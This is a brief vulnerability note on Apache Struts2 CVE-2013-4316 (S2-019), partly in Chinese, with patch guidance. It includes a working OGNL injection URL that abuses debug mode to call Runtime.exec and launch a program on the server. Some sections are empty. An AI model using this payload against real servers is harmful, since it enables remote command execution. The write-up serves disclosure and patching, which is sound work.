struts2 CVE-2013-4316 S2-019 Dynamic method executions Vul

catalog

1. Description
2. Effected Scope
3. Exploit Analysis
4. Principle Of Vulnerability
5. Patch Fix

1. Description

Dynamic Method Invocation is a mechanism known to impose possible security vulnerabilities, but until now it was enabled by default with warning that users should switch it off if possible.

[b]Relevant Link:[/b]

http://struts.apache.org/docs/s2-019.html?spm=5176.775974950.2.8.iJuruO

2. Effected Scope

3. Exploit Analysis

0x1: POC

需要目标struts2应用开启debug模式

http://localhost:8080/crazyit/register.action?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField
%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,
@java.lang.Runtime@getRuntime%28%29.exec%28%27/Applications/Calculator.app/Contents/MacOS/Calculator%27%29
/*
http://localhost:8080/crazyit/register.action?debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField
('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),
@java.lang.Runtime@getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')
*/

[b]Relevant Link:[/b]

http://qqhack8.blog.163.com/blog/static/114147985201463194423958/ http://qqhack8.blog.163.com/blog/static/114147985201402743220859[/code] 
4. Principle Of Vulnerability

5. Patch Fix

[b]0x1: upgrade struts2[/b]

In Struts 2.3.15.2 the Dynamic Method Invocation is to false by default. Another option is to set 
struts.enable.DynamicMethodInvocation
 to false in struts.xml

<constant name="struts.enable.DynamicMethodInvocation" value="false"/>


0x2: 手动修复方法

1. 使用过滤器对相关关键字进行拦截，需要修改struts.xml，并重启struts2应用进程
2. 动态关闭struts2的属性开关(hotfix)
3. 使用waf进行URL层面的拦截


[b]Relevant Link:[/b]

http://www.fjssc.cn/html/research/notice/2014/0127/78.html